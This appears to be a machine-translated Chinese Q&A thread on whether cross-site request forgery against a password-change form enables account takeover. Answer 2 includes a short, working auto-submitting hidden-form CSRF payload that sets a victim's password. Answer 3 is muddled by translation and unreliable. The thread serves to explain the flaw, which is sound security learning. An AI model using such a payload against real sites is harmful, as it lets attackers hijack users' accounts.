通过CSRF更改密码会导致帐户接管吗？

Question

如果网站具有密码更改功能，用户没有被提示输入当前密码，并且表单没有使用令牌来减轻CSRF攻击，攻击者可以很容易地在登录用户上执行CSRF攻击，从而诱骗受害者更改密码。

但是，考虑到web应用程序中没有其他缺陷，攻击者能否了解受害者的用户名，从而能够使用攻击者设置的新密码进行实际登录？

Answer 1

是。想象一下，在高调用户中，你已经有了自己的用户名。您所需要的只是将它们发送到您精心制作的CSRF页面，并且您已经接管了他们的帐户。或者，如果网络应用程序接受您的电子邮件地址作为另一个用户名，则可以进行大规模的网络钓鱼活动。

安全关键流的CSRF是非常危险的。当用户名(几乎总是)不存在的时候，你就会指望它的行为就像一个秘密值。也见用户枚举向量等。

Answer 2

如果没有反CSRF，攻击者就不需要用户名。在登录时，他只需要欺骗用户访问他控制的页面。

像这样的页面会起作用的：

<iframe style="display:none" name="passframe"></iframe>
<form method='POST' action='http://vulnerable.com/pass.php' target="passframe" id="passform">
  <input type='hidden' name='password1' value='123456'>
  <input type='hidden' name='password2' value='123456'>
  <input type='submit' value='submit'>
</form>
<script>document.getElementById("passform").submit()</script>

如果用户登录并降落在此页面上，则将更改他的密码。

Answer 3

我也不知道漏洞和影响是什么，因为攻击者不能在没有发送链接的情况下更改其他用户的r密码。

如果攻击者发送一个链接，用户单击并登录，那么攻击者会看到用户的密码或电子邮件吗？

攻击者更改用户的密码，然后用户有自己的电子邮件，他们忘记密码与他们的电子邮件。